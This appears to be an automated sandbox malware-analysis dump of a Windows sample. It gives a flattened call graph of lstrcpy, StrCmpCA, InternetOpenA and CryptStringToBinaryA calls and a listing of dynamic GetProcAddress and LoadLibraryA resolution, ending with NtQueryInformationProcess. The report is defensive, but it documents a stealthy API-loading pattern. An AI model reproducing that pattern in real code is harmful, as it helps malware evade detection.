13842 2645c0 2 API calls 13841->13842 13843 2629a2 13842->13843 13844 2645c0 2 API calls 13843->13844 13845 2629bb 13844->13845 13846 2645c0 2 API calls 13845->13846 13847 2629d4 13846->13847 13848 2645c0 2 API calls 13847->13848 13849 2629ed 13848->13849 13850 2645c0 2 API calls 13849->13850 13851 262a06 13850->13851 13852 2645c0 2 API calls 13851->13852 13853 262a1f 13852->13853 13854 2645c0 2 API calls 13853->13854 13855 262a38 13854->13855 13856 2645c0 2 API calls 13855->13856 13857 262a51 13856->13857 13858 2645c0 2 API calls 13857->13858 13859 262a6a 13858->13859 13860 2645c0 2 API calls 13859->13860 13861 262a83 13860->13861 13862 2645c0 2 API calls 13861->13862 13863 262a9c 13862->13863 13864 2645c0 2 API calls 13863->13864 13865 262ab5 13864->13865 13866 2645c0 2 API calls 13865->13866 13867 262ace 13866->13867 13868 2645c0 2 API calls 13867->13868 13869 262ae7 13868->13869 13870 2645c0 2 API calls 13869->13870 13871 262b00 13870->13871 13872 2645c0 2 API calls 13871->13872 13873 262b19 13872->13873 13874 2645c0 2 API calls 13873->13874 13875 262b32 13874->13875 13876 2645c0 2 API calls 13875->13876 13877 262b4b 13876->13877 13878 2645c0 2 API calls 13877->13878 13879 262b64 13878->13879 13880 2645c0 2 API calls 13879->13880 13881 262b7d 13880->13881 13882 2645c0 2 API calls 13881->13882 13883 262b96 13882->13883 13884 2645c0 2 API calls 13883->13884 13885 262baf 13884->13885 13886 2645c0 2 API calls 13885->13886 13887 262bc8 13886->13887 13888 2645c0 2 API calls 13887->13888 13889 262be1 13888->13889 13890 2645c0 2 API calls 13889->13890 13891 262bfa 13890->13891 13892 2645c0 2 API calls 13891->13892 13893 262c13 13892->13893 13894 2645c0 2 API calls 13893->13894 13895 262c2c 13894->13895 13896 2645c0 2 API calls 13895->13896 13897 262c45 13896->13897 13898 2645c0 2 API calls 13897->13898 13899 262c5e 13898->13899 13900 2645c0 2 API calls 13899->13900 13901 262c77 13900->13901 13902 2645c0 2 API calls 13901->13902 13903 262c90 13902->13903 13904 2645c0 2 
API calls 13903->13904 13905 262ca9 13904->13905 13906 2645c0 2 API calls 13905->13906 13907 262cc2 13906->13907 13908 2645c0 2 API calls 13907->13908 13909 262cdb 13908->13909 13910 2645c0 2 API calls 13909->13910 13911 262cf4 13910->13911 13912 2645c0 2 API calls 13911->13912 13913 262d0d 13912->13913 13914 2645c0 2 API calls 13913->13914 13915 262d26 13914->13915 13916 2645c0 2 API calls 13915->13916 13917 262d3f 13916->13917 13918 2645c0 2 API calls 13917->13918 13919 262d58 13918->13919 13920 2645c0 2 API calls 13919->13920 13921 262d71 13920->13921 13922 2645c0 2 API calls 13921->13922 13923 262d8a 13922->13923 13924 2645c0 2 API calls 13923->13924 13925 262da3 13924->13925 13926 2645c0 2 API calls 13925->13926 13927 262dbc 13926->13927 13928 2645c0 2 API calls 13927->13928 13929 262dd5 13928->13929 13930 2645c0 2 API calls 13929->13930 13931 262dee 13930->13931 13932 2645c0 2 API calls 13931->13932 13933 262e07 13932->13933 13934 2645c0 2 API calls 13933->13934 13935 262e20 13934->13935 13936 2645c0 2 API calls 13935->13936 13937 262e39 13936->13937 13938 2645c0 2 API calls 13937->13938 13939 262e52 13938->13939 13940 2645c0 2 API calls 13939->13940 13941 262e6b 13940->13941 13942 2645c0 2 API calls 13941->13942 13943 262e84 13942->13943 13944 2645c0 2 API calls 13943->13944 13945 262e9d 13944->13945 13946 2645c0 2 API calls 13945->13946 13947 262eb6 13946->13947 13948 2645c0 2 API calls 13947->13948 13949 262ecf 13948->13949 13950 2645c0 2 API calls 13949->13950 13951 262ee8 13950->13951 13952 2645c0 2 API calls 13951->13952 13953 262f01 13952->13953 13954 2645c0 2 API calls 13953->13954 13955 262f1a 13954->13955 13956 2645c0 2 API calls 13955->13956 13957 262f33 13956->13957 13958 2645c0 2 API calls 13957->13958 13959 262f4c 13958->13959 13960 2645c0 2 API calls 13959->13960 13961 262f65 13960->13961 13962 2645c0 2 API calls 13961->13962 13963 262f7e 13962->13963 13964 2645c0 2 API calls 13963->13964 13965 262f97 13964->13965 13966 2645c0 2 API calls 
13965->13966 13967 262fb0 13966->13967 13968 2645c0 2 API calls 13967->13968 13969 262fc9 13968->13969 13970 2645c0 2 API calls 13969->13970 13971 262fe2 13970->13971 13972 2645c0 2 API calls 13971->13972 13973 262ffb 13972->13973 13974 2645c0 2 API calls 13973->13974 13975 263014 13974->13975 13976 2645c0 2 API calls 13975->13976 13977 26302d 13976->13977 13978 2645c0 2 API calls 13977->13978 13979 263046 13978->13979 13980 2645c0 2 API calls 13979->13980 13981 26305f 13980->13981 13982 2645c0 2 API calls 13981->13982 13983 263078 13982->13983 13984 2645c0 2 API calls 13983->13984 13985 263091 13984->13985 13986 2645c0 2 API calls 13985->13986 13987 2630aa 13986->13987 13988 2645c0 2 API calls 13987->13988 13989 2630c3 13988->13989 13990 2645c0 2 API calls 13989->13990 13991 2630dc 13990->13991 13992 2645c0 2 API calls 13991->13992 13993 2630f5 13992->13993 13994 2645c0 2 API calls 13993->13994 13995 26310e 13994->13995 13996 2645c0 2 API calls 13995->13996 13997 263127 13996->13997 13998 2645c0 2 API calls 13997->13998 13999 263140 13998->13999 14000 2645c0 2 API calls 13999->14000 14001 263159 14000->14001 14002 2645c0 2 API calls 14001->14002 14003 263172 14002->14003 14004 2645c0 2 API calls 14003->14004 14005 26318b 14004->14005 14006 2645c0 2 API calls 14005->14006 14007 2631a4 14006->14007 14008 2645c0 2 API calls 14007->14008 14009 2631bd 14008->14009 14010 2645c0 2 API calls 14009->14010 14011 2631d6 14010->14011 14012 2645c0 2 API calls 14011->14012 14013 2631ef 14012->14013 14014 2645c0 2 API calls 14013->14014 14015 263208 14014->14015 14016 2645c0 2 API calls 14015->14016 14017 263221 14016->14017 14018 2645c0 2 API calls 14017->14018 14019 26323a 14018->14019 14020 2645c0 2 API calls 14019->14020 14021 263253 14020->14021 14022 2645c0 2 API calls 14021->14022 14023 26326c 14022->14023 14024 2645c0 2 API calls 14023->14024 14025 263285 14024->14025 14026 2645c0 2 API calls 14025->14026 14027 26329e 14026->14027 14028 2645c0 2 API calls 14027->14028 
14029 2632b7 14028->14029 14030 2645c0 2 API calls 14029->14030 14031 2632d0 14030->14031 14032 2645c0 2 API calls 14031->14032 14033 2632e9 14032->14033 14034 2645c0 2 API calls 14033->14034 14035 263302 14034->14035 14036 2645c0 2 API calls 14035->14036 14037 26331b 14036->14037 14038 2645c0 2 API calls 14037->14038 14039 263334 14038->14039 14040 2645c0 2 API calls 14039->14040 14041 26334d 14040->14041 14042 2645c0 2 API calls 14041->14042 14043 263366 14042->14043 14044 2645c0 2 API calls 14043->14044 14045 26337f 14044->14045 14046 2645c0 2 API calls 14045->14046 14047 263398 14046->14047 14048 2645c0 2 API calls 14047->14048 14049 2633b1 14048->14049 14050 2645c0 2 API calls 14049->14050 14051 2633ca 14050->14051 14052 2645c0 2 API calls 14051->14052 14053 2633e3 14052->14053 14054 2645c0 2 API calls 14053->14054 14055 2633fc 14054->14055 14056 2645c0 2 API calls 14055->14056 14057 263415 14056->14057 14058 2645c0 2 API calls 14057->14058 14059 26342e 14058->14059 14060 2645c0 2 API calls 14059->14060 14061 263447 14060->14061 14062 2645c0 2 API calls 14061->14062 14063 263460 14062->14063 14064 2645c0 2 API calls 14063->14064 14065 263479 14064->14065 14066 2645c0 2 API calls 14065->14066 14067 263492 14066->14067 14068 2645c0 2 API calls 14067->14068 14069 2634ab 14068->14069 14070 2645c0 2 API calls 14069->14070 14071 2634c4 14070->14071 14072 2645c0 2 API calls 14071->14072 14073 2634dd 14072->14073 14074 2645c0 2 API calls 14073->14074 14075 2634f6 14074->14075 14076 2645c0 2 API calls 14075->14076 14077 26350f 14076->14077 14078 2645c0 2 API calls 14077->14078 14079 263528 14078->14079 14080 2645c0 2 API calls 14079->14080 14081 263541 14080->14081 14082 2645c0 2 API calls 14081->14082 14083 26355a 14082->14083 14084 2645c0 2 API calls 14083->14084 14085 263573 14084->14085 14086 2645c0 2 API calls 14085->14086 14087 26358c 14086->14087 14088 2645c0 2 API calls 14087->14088 14089 2635a5 14088->14089 14090 2645c0 2 API calls 14089->14090 14091 2635be 
14090->14091 14092 2645c0 2 API calls 14091->14092 14093 2635d7 14092->14093 14094 2645c0 2 API calls 14093->14094 14095 2635f0 14094->14095 14096 2645c0 2 API calls 14095->14096 14097 263609 14096->14097 14098 2645c0 2 API calls 14097->14098 14099 263622 14098->14099 14100 2645c0 2 API calls 14099->14100 14101 26363b 14100->14101 14102 2645c0 2 API calls 14101->14102 14103 263654 14102->14103 14104 2645c0 2 API calls 14103->14104 14105 26366d 14104->14105 14106 2645c0 2 API calls 14105->14106 14107 263686 14106->14107 14108 2645c0 2 API calls 14107->14108 14109 26369f 14108->14109 14110 2645c0 2 API calls 14109->14110 14111 2636b8 14110->14111 14112 2645c0 2 API calls 14111->14112 14113 2636d1 14112->14113 14114 2645c0 2 API calls 14113->14114 14115 2636ea 14114->14115 14116 2645c0 2 API calls 14115->14116 14117 263703 14116->14117 14118 2645c0 2 API calls 14117->14118 14119 26371c 14118->14119 14120 2645c0 2 API calls 14119->14120 14121 263735 14120->14121 14122 2645c0 2 API calls 14121->14122 14123 26374e 14122->14123 14124 2645c0 2 API calls 14123->14124 14125 263767 14124->14125 14126 2645c0 2 API calls 14125->14126 14127 263780 14126->14127 14128 2645c0 2 API calls 14127->14128 14129 263799 14128->14129 14130 2645c0 2 API calls 14129->14130 14131 2637b2 14130->14131 14132 2645c0 2 API calls 14131->14132 14133 2637cb 14132->14133 14134 2645c0 2 API calls 14133->14134 14135 2637e4 14134->14135 14136 2645c0 2 API calls 14135->14136 14137 2637fd 14136->14137 14138 2645c0 2 API calls 14137->14138 14139 263816 14138->14139 14140 2645c0 2 API calls 14139->14140 14141 26382f 14140->14141 14142 2645c0 2 API calls 14141->14142 14143 263848 14142->14143 14144 2645c0 2 API calls 14143->14144 14145 263861 14144->14145 14146 2645c0 2 API calls 14145->14146 14147 26387a 14146->14147 14148 2645c0 2 API calls 14147->14148 14149 263893 14148->14149 14150 2645c0 2 API calls 14149->14150 14151 2638ac 14150->14151 14152 2645c0 2 API calls 14151->14152 14153 2638c5 14152->14153 
14154 2645c0 2 API calls 14153->14154 14155 2638de 14154->14155 14156 2645c0 2 API calls 14155->14156 14157 2638f7 14156->14157 14158 2645c0 2 API calls 14157->14158 14159 263910 14158->14159 14160 2645c0 2 API calls 14159->14160 14161 263929 14160->14161 14162 2645c0 2 API calls 14161->14162 14163 263942 14162->14163 14164 2645c0 2 API calls 14163->14164 14165 26395b 14164->14165 14166 2645c0 2 API calls 14165->14166 14167 263974 14166->14167 14168 2645c0 2 API calls 14167->14168 14169 26398d 14168->14169 14170 2645c0 2 API calls 14169->14170 14171 2639a6 14170->14171 14172 2645c0 2 API calls 14171->14172 14173 2639bf 14172->14173 14174 2645c0 2 API calls 14173->14174 14175 2639d8 14174->14175 14176 2645c0 2 API calls 14175->14176 14177 2639f1 14176->14177 14178 2645c0 2 API calls 14177->14178 14179 263a0a 14178->14179 14180 2645c0 2 API calls 14179->14180 14181 263a23 14180->14181 14182 2645c0 2 API calls 14181->14182 14183 263a3c 14182->14183 14184 2645c0 2 API calls 14183->14184 14185 263a55 14184->14185 14186 2645c0 2 API calls 14185->14186 14187 263a6e 14186->14187 14188 2645c0 2 API calls 14187->14188 14189 263a87 14188->14189 14190 2645c0 2 API calls 14189->14190 14191 263aa0 14190->14191 14192 2645c0 2 API calls 14191->14192 14193 263ab9 14192->14193 14194 2645c0 2 API calls 14193->14194 14195 263ad2 14194->14195 14196 2645c0 2 API calls 14195->14196 14197 263aeb 14196->14197 14198 2645c0 2 API calls 14197->14198 14199 263b04 14198->14199 14200 2645c0 2 API calls 14199->14200 14201 263b1d 14200->14201 14202 2645c0 2 API calls 14201->14202 14203 263b36 14202->14203 14204 2645c0 2 API calls 14203->14204 14205 263b4f 14204->14205 14206 2645c0 2 API calls 14205->14206 14207 263b68 14206->14207 14208 2645c0 2 API calls 14207->14208 14209 263b81 14208->14209 14210 2645c0 2 API calls 14209->14210 14211 263b9a 14210->14211 14212 2645c0 2 API calls 14211->14212 14213 263bb3 14212->14213 14214 2645c0 2 API calls 14213->14214 14215 263bcc 14214->14215 14216 2645c0 2 
API calls 14215->14216 14217 263be5 14216->14217 14218 2645c0 2 API calls 14217->14218 14219 263bfe 14218->14219 14220 2645c0 2 API calls 14219->14220 14221 263c17 14220->14221 14222 2645c0 2 API calls 14221->14222 14223 263c30 14222->14223 14224 2645c0 2 API calls 14223->14224 14225 263c49 14224->14225 14226 2645c0 2 API calls 14225->14226 14227 263c62 14226->14227 14228 2645c0 2 API calls 14227->14228 14229 263c7b 14228->14229 14230 2645c0 2 API calls 14229->14230 14231 263c94 14230->14231 14232 2645c0 2 API calls 14231->14232 14233 263cad 14232->14233 14234 2645c0 2 API calls 14233->14234 14235 263cc6 14234->14235 14236 2645c0 2 API calls 14235->14236 14237 263cdf 14236->14237 14238 2645c0 2 API calls 14237->14238 14239 263cf8 14238->14239 14240 2645c0 2 API calls 14239->14240 14241 263d11 14240->14241 14242 2645c0 2 API calls 14241->14242 14243 263d2a 14242->14243 14244 2645c0 2 API calls 14243->14244 14245 263d43 14244->14245 14246 2645c0 2 API calls 14245->14246 14247 263d5c 14246->14247 14248 2645c0 2 API calls 14247->14248 14249 263d75 14248->14249 14250 2645c0 2 API calls 14249->14250 14251 263d8e 14250->14251 14252 2645c0 2 API calls 14251->14252 14253 263da7 14252->14253 14254 2645c0 2 API calls 14253->14254 14255 263dc0 14254->14255 14256 2645c0 2 API calls 14255->14256 14257 263dd9 14256->14257 14258 2645c0 2 API calls 14257->14258 14259 263df2 14258->14259 14260 2645c0 2 API calls 14259->14260 14261 263e0b 14260->14261 14262 2645c0 2 API calls 14261->14262 14263 263e24 14262->14263 14264 2645c0 2 API calls 14263->14264 14265 263e3d 14264->14265 14266 2645c0 2 API calls 14265->14266 14267 263e56 14266->14267 14268 2645c0 2 API calls 14267->14268 14269 263e6f 14268->14269 14270 2645c0 2 API calls 14269->14270 14271 263e88 14270->14271 14272 2645c0 2 API calls 14271->14272 14273 263ea1 14272->14273 14274 2645c0 2 API calls 14273->14274 14275 263eba 14274->14275 14276 2645c0 2 API calls 14275->14276 14277 263ed3 14276->14277 14278 2645c0 2 API calls 
14277->14278 14279 263eec 14278->14279 14280 2645c0 2 API calls 14279->14280 14281 263f05 14280->14281 14282 2645c0 2 API calls 14281->14282 14283 263f1e 14282->14283 14284 2645c0 2 API calls 14283->14284 14285 263f37 14284->14285 14286 2645c0 2 API calls 14285->14286 14287 263f50 14286->14287 14288 2645c0 2 API calls 14287->14288 14289 263f69 14288->14289 14290 2645c0 2 API calls 14289->14290 14291 263f82 14290->14291 14292 2645c0 2 API calls 14291->14292 14293 263f9b 14292->14293 14294 2645c0 2 API calls 14293->14294 14295 263fb4 14294->14295 14296 2645c0 2 API calls 14295->14296 14297 263fcd 14296->14297 14298 2645c0 2 API calls 14297->14298 14299 263fe6 14298->14299 14300 2645c0 2 API calls 14299->14300 14301 263fff 14300->14301 14302 2645c0 2 API calls 14301->14302 14303 264018 14302->14303 14304 2645c0 2 API calls 14303->14304 14305 264031 14304->14305 14306 2645c0 2 API calls 14305->14306 14307 26404a 14306->14307 14308 2645c0 2 API calls 14307->14308 14309 264063 14308->14309 14310 2645c0 2 API calls 14309->14310 14311 26407c 14310->14311 14312 2645c0 2 API calls 14311->14312 14313 264095 14312->14313 14314 2645c0 2 API calls 14313->14314 14315 2640ae 14314->14315 14316 2645c0 2 API calls 14315->14316 14317 2640c7 14316->14317 14318 2645c0 2 API calls 14317->14318 14319 2640e0 14318->14319 14320 2645c0 2 API calls 14319->14320 14321 2640f9 14320->14321 14322 2645c0 2 API calls 14321->14322 14323 264112 14322->14323 14324 2645c0 2 API calls 14323->14324 14325 26412b 14324->14325 14326 2645c0 2 API calls 14325->14326 14327 264144 14326->14327 14328 2645c0 2 API calls 14327->14328 14329 26415d 14328->14329 14330 2645c0 2 API calls 14329->14330 14331 264176 14330->14331 14332 2645c0 2 API calls 14331->14332 14333 26418f 14332->14333 14334 2645c0 2 API calls 14333->14334 14335 2641a8 14334->14335 14336 2645c0 2 API calls 14335->14336 14337 2641c1 14336->14337 14338 2645c0 2 API calls 14337->14338 14339 2641da 14338->14339 14340 2645c0 2 API calls 14339->14340 
14341 2641f3 14340->14341 14342 2645c0 2 API calls 14341->14342 14343 26420c 14342->14343 14344 2645c0 2 API calls 14343->14344 14345 264225 14344->14345 14346 2645c0 2 API calls 14345->14346 14347 26423e 14346->14347 14348 2645c0 2 API calls 14347->14348 14349 264257 14348->14349 14350 2645c0 2 API calls 14349->14350 14351 264270 14350->14351 14352 2645c0 2 API calls 14351->14352 14353 264289 14352->14353 14354 2645c0 2 API calls 14353->14354 14355 2642a2 14354->14355 14356 2645c0 2 API calls 14355->14356 14357 2642bb 14356->14357 14358 2645c0 2 API calls 14357->14358 14359 2642d4 14358->14359 14360 2645c0 2 API calls 14359->14360 14361 2642ed 14360->14361 14362 2645c0 2 API calls 14361->14362 14363 264306 14362->14363 14364 2645c0 2 API calls 14363->14364 14365 26431f 14364->14365 14366 2645c0 2 API calls 14365->14366 14367 264338 14366->14367 14368 2645c0 2 API calls 14367->14368 14369 264351 14368->14369 14370 2645c0 2 API calls 14369->14370 14371 26436a 14370->14371 14372 2645c0 2 API calls 14371->14372 14373 264383 14372->14373 14374 2645c0 2 API calls 14373->14374 14375 26439c 14374->14375 14376 2645c0 2 API calls 14375->14376 14377 2643b5 14376->14377 14378 2645c0 2 API calls 14377->14378 14379 2643ce 14378->14379 14380 2645c0 2 API calls 14379->14380 14381 2643e7 14380->14381 14382 2645c0 2 API calls 14381->14382 14383 264400 14382->14383 14384 2645c0 2 API calls 14383->14384 14385 264419 14384->14385 14386 2645c0 2 API calls 14385->14386 14387 264432 14386->14387 14388 2645c0 2 API calls 14387->14388 14389 26444b 14388->14389 14390 2645c0 2 API calls 14389->14390 14391 264464 14390->14391 14392 2645c0 2 API calls 14391->14392 14393 26447d 14392->14393 14394 2645c0 2 API calls 14393->14394 14395 264496 14394->14395 14396 2645c0 2 API calls 14395->14396 14397 2644af 14396->14397 14398 2645c0 2 API calls 14397->14398 14399 2644c8 14398->14399 14400 2645c0 2 API calls 14399->14400 14401 2644e1 14400->14401 14402 2645c0 2 API calls 14401->14402 14403 2644fa 
14402->14403 14404 2645c0 2 API calls 14403->14404 14405 264513 14404->14405 14406 2645c0 2 API calls 14405->14406 14407 26452c 14406->14407 14408 2645c0 2 API calls 14407->14408 14409 264545 14408->14409 14410 2645c0 2 API calls 14409->14410 14411 26455e 14410->14411 14412 2645c0 2 API calls 14411->14412 14413 264577 14412->14413 14414 2645c0 2 API calls 14413->14414 14415 264590 14414->14415 14416 2645c0 2 API calls 14415->14416 14417 2645a9 14416->14417 14418 279c10 14417->14418 14419 27a036 8 API calls 14418->14419 14420 279c20 43 API calls 14418->14420 14421 27a146 14419->14421 14422 27a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14419->14422 14420->14419 14423 27a216 14421->14423 14424 27a153 8 API calls 14421->14424 14422->14421 14425 27a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14423->14425 14426 27a298 14423->14426 14424->14423 14425->14426 14427 27a337 14426->14427 14428 27a2a5 6 API calls 14426->14428 14429 27a344 9 API calls 14427->14429 14430 27a41f 14427->14430 14428->14427 14429->14430 14431 27a4a2 14430->14431 14432 27a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14430->14432 14433 27a4dc 14431->14433 14434 27a4ab GetProcAddress GetProcAddress 14431->14434 14432->14431 14435 27a515 14433->14435 14436 27a4e5 GetProcAddress GetProcAddress 14433->14436 14434->14433 14437 27a612 14435->14437 14438 27a522 10 API calls 14435->14438 14436->14435 14439 27a67d 14437->14439 14440 27a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14437->14440 14438->14437 14441 27a686 GetProcAddress 14439->14441 14442 27a69e 14439->14442 14440->14439 14441->14442 14443 27a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14442->14443 14444 275ca3 14442->14444 14443->14444 14445 261590 14444->14445 15564 261670 14445->15564 14448 27a7a0 lstrcpy 14449 2615b5 14448->14449 14450 27a7a0 lstrcpy 14449->14450 14451 2615c7 14450->14451 14452 27a7a0 
lstrcpy 14451->14452 14453 2615d9 14452->14453 14454 27a7a0 lstrcpy 14453->14454 14455 261663 14454->14455 14456 275510 14455->14456 14457 275521 14456->14457 14458 27a820 2 API calls 14457->14458 14459 27552e 14458->14459 14460 27a820 2 API calls 14459->14460 14461 27553b 14460->14461 14462 27a820 2 API calls 14461->14462 14463 275548 14462->14463 14464 27a740 lstrcpy 14463->14464 14465 275555 14464->14465 14466 27a740 lstrcpy 14465->14466 14467 275562 14466->14467 14468 27a740 lstrcpy 14467->14468 14469 27556f 14468->14469 14470 27a740 lstrcpy 14469->14470 14509 27557c 14470->14509 14471 261590 lstrcpy 14471->14509 14472 2752c0 25 API calls 14472->14509 14473 275643 StrCmpCA 14473->14509 14474 2756a0 StrCmpCA 14475 2757dc 14474->14475 14474->14509 14476 27a8a0 lstrcpy 14475->14476 14477 2757e8 14476->14477 14478 27a820 2 API calls 14477->14478 14479 2757f6 14478->14479 14481 27a820 2 API calls 14479->14481 14480 275856 StrCmpCA 14482 275991 14480->14482 14480->14509 14486 275805 14481->14486 14485 27a8a0 lstrcpy 14482->14485 14483 27a740 lstrcpy 14483->14509 14484 27a8a0 lstrcpy 14484->14509 14487 27599d 14485->14487 14488 261670 lstrcpy 14486->14488 14490 27a820 2 API calls 14487->14490 14508 275811 14488->14508 14489 27a820 lstrlen lstrcpy 14489->14509 14491 2759ab 14490->14491 14494 27a820 2 API calls 14491->14494 14492 275a0b StrCmpCA 14495 275a16 Sleep 14492->14495 14496 275a28 14492->14496 14493 27a7a0 lstrcpy 14493->14509 14498 2759ba 14494->14498 14495->14509 14497 27a8a0 lstrcpy 14496->14497 14499 275a34 14497->14499 14500 261670 lstrcpy 14498->14500 14501 27a820 2 API calls 14499->14501 14500->14508 14502 275a43 14501->14502 14503 27a820 2 API calls 14502->14503 14504 275a52 14503->14504 14506 261670 lstrcpy 14504->14506 14505 27578a StrCmpCA 14505->14509 14506->14508 14507 27593f StrCmpCA 14507->14509 14508->13563 14509->14471 14509->14472 14509->14473 14509->14474 14509->14480 14509->14483 14509->14484 14509->14489 14509->14492 14509->14493 
14509->14505 14509->14507 14510 2751f0 20 API calls 14509->14510 14510->14509 14512 277553 GetVolumeInformationA 14511->14512 14513 27754c 14511->14513 14514 277591 14512->14514 14513->14512 14515 2775fc GetProcessHeap RtlAllocateHeap 14514->14515 14516 277619 14515->14516 14517 277628 wsprintfA 14515->14517 14519 27a740 lstrcpy 14516->14519 14518 27a740 lstrcpy 14517->14518 14520 275da7 14518->14520 14519->14520 14520->13584 14522 27a7a0 lstrcpy 14521->14522 14523 264899 14522->14523 15573 2647b0 14523->15573 14525 2648a5 14526 27a740 lstrcpy 14525->14526 14527 2648d7 14526->14527 14528 27a740 lstrcpy 14527->14528 14529 2648e4 14528->14529 14530 27a740 lstrcpy 14529->14530 14531 2648f1 14530->14531 14532 27a740 lstrcpy 14531->14532 14533 2648fe 14532->14533 14534 27a740 lstrcpy 14533->14534 14535 26490b InternetOpenA StrCmpCA 14534->14535 14536 264944 14535->14536 14537 264ecb InternetCloseHandle 14536->14537 15579 278b60 14536->15579 14539 264ee8 14537->14539 15594 269ac0 CryptStringToBinaryA 14539->15594 14540 264963 15587 27a920 14540->15587 14544 264976 14545 27a8a0 lstrcpy 14544->14545 14550 26497f 14545->14550 14546 27a820 2 API calls 14547 264f05 14546->14547 14548 27a9b0 4 API calls 14547->14548 14551 264f1b 14548->14551 14549 264f27 ctype 14552 27a7a0 lstrcpy 14549->14552 14554 27a9b0 4 API calls 14550->14554 14553 27a8a0 lstrcpy 14551->14553 14565 264f57 14552->14565 14553->14549 14555 2649a9 14554->14555 14556 27a8a0 lstrcpy 14555->14556 14557 2649b2 14556->14557 14558 27a9b0 4 API calls 14557->14558 14559 2649d1 14558->14559 14560 27a8a0 lstrcpy 14559->14560 14561 2649da 14560->14561 14562 27a920 3 API calls 14561->14562 14563 2649f8 14562->14563 14564 27a8a0 lstrcpy 14563->14564 14566 264a01 14564->14566 14565->13587 14567 27a9b0 4 API calls 14566->14567 14568 264a20 14567->14568 14569 27a8a0 lstrcpy 14568->14569 14570 264a29 14569->14570 14571 27a9b0 4 API calls 14570->14571 14572 264a48 14571->14572 14573 27a8a0 lstrcpy 14572->14573 14574 264a51 

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 660 279860-279874 call 279750 663 279a93-279af2 LoadLibraryA * 5 660->663 664 27987a-279a8e call 279780 GetProcAddress * 21 660->664 666 279af4-279b08 GetProcAddress 663->666 667 279b0d-279b14 663->667 664->663 666->667 669 279b46-279b4d 667->669 670 279b16-279b41 GetProcAddress * 2 667->670 671 279b4f-279b63 GetProcAddress 669->671 672 279b68-279b6f 669->672 670->669 671->672 673 279b71-279b84 GetProcAddress 672->673 674 279b89-279b90 672->674 673->674 675 279b92-279bbc GetProcAddress * 2 674->675 676 279bc1-279bc2 674->676 675->676
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,00E22338), ref: 002798A1
                        • GetProcAddress.KERNEL32(74DD0000,00E22290), ref: 002798BA
                        • GetProcAddress.KERNEL32(74DD0000,00E22278), ref: 002798D2
                        • GetProcAddress.KERNEL32(74DD0000,00E22410), ref: 002798EA
                        • GetProcAddress.KERNEL32(74DD0000,00E223E0), ref: 00279903
                        • GetProcAddress.KERNEL32(74DD0000,00E290B0), ref: 0027991B
                        • GetProcAddress.KERNEL32(74DD0000,00E155B0), ref: 00279933
                        • GetProcAddress.KERNEL32(74DD0000,00E15230), ref: 0027994C
                        • GetProcAddress.KERNEL32(74DD0000,00E221A0), ref: 00279964
                        • GetProcAddress.KERNEL32(74DD0000,00E22398), ref: 0027997C
                        • GetProcAddress.KERNEL32(74DD0000,00E22158), ref: 00279995
                        • GetProcAddress.KERNEL32(74DD0000,00E222A8), ref: 002799AD
                        • GetProcAddress.KERNEL32(74DD0000,00E152F0), ref: 002799C5
                        • GetProcAddress.KERNEL32(74DD0000,00E221B8), ref: 002799DE
                        • GetProcAddress.KERNEL32(74DD0000,00E221E8), ref: 002799F6
                        • GetProcAddress.KERNEL32(74DD0000,00E15550), ref: 00279A0E
                        • GetProcAddress.KERNEL32(74DD0000,00E22200), ref: 00279A27
                        • GetProcAddress.KERNEL32(74DD0000,00E22218), ref: 00279A3F
                        • GetProcAddress.KERNEL32(74DD0000,00E152B0), ref: 00279A57
                        • GetProcAddress.KERNEL32(74DD0000,00E22230), ref: 00279A70
                        • GetProcAddress.KERNEL32(74DD0000,00E153F0), ref: 00279A88
                        • LoadLibraryA.KERNEL32(00E22500,?,00276A00), ref: 00279A9A
                        • LoadLibraryA.KERNEL32(00E22440,?,00276A00), ref: 00279AAB
                        • LoadLibraryA.KERNEL32(00E22488,?,00276A00), ref: 00279ABD
                        • LoadLibraryA.KERNEL32(00E224D0,?,00276A00), ref: 00279ACF
                        • LoadLibraryA.KERNEL32(00E224E8,?,00276A00), ref: 00279AE0
                        • GetProcAddress.KERNEL32(75A70000,00E224B8), ref: 00279B02
                        • GetProcAddress.KERNEL32(75290000,00E22458), ref: 00279B23
                        • GetProcAddress.KERNEL32(75290000,00E224A0), ref: 00279B3B
                        • GetProcAddress.KERNEL32(75BD0000,00E22470), ref: 00279B5D
                        • GetProcAddress.KERNEL32(75450000,00E154F0), ref: 00279B7E
                        • GetProcAddress.KERNEL32(76E90000,00E29120), ref: 00279B9F
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00279BB6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
